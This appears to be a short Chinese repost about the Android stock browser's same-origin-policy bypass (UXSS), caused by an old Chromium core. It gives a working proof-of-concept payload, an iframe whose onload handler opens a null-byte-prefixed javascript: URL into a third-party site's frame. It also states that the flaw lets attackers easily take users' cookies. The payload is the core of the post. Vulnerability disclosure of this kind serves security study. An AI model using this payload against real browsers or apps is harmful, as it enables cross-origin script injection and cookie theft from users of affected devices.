相关链接:http://www.rafayhackingarticles.net/2014/08/android-browser-same-origin-policy.html
测试链接:http://x7s.pw/001.html
<iframe name="m" src="http://www.foxck.com/" onload="window.open('\u0000javascript:alert(document.location)','m')" >
成因:因为安卓内置的浏览器使用的是旧版的Chromium内核,所以引入了旧版本的历史 漏洞 (新版本已修复),利用此漏洞可轻易获取用户网站的cookie,各种调用安卓内置 浏览器 的浏览器及app躺枪!
摘自:http://zone.wooyun.org/content/14945
查看更多关于安卓内置浏览器跨域漏洞(UXSS) - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15312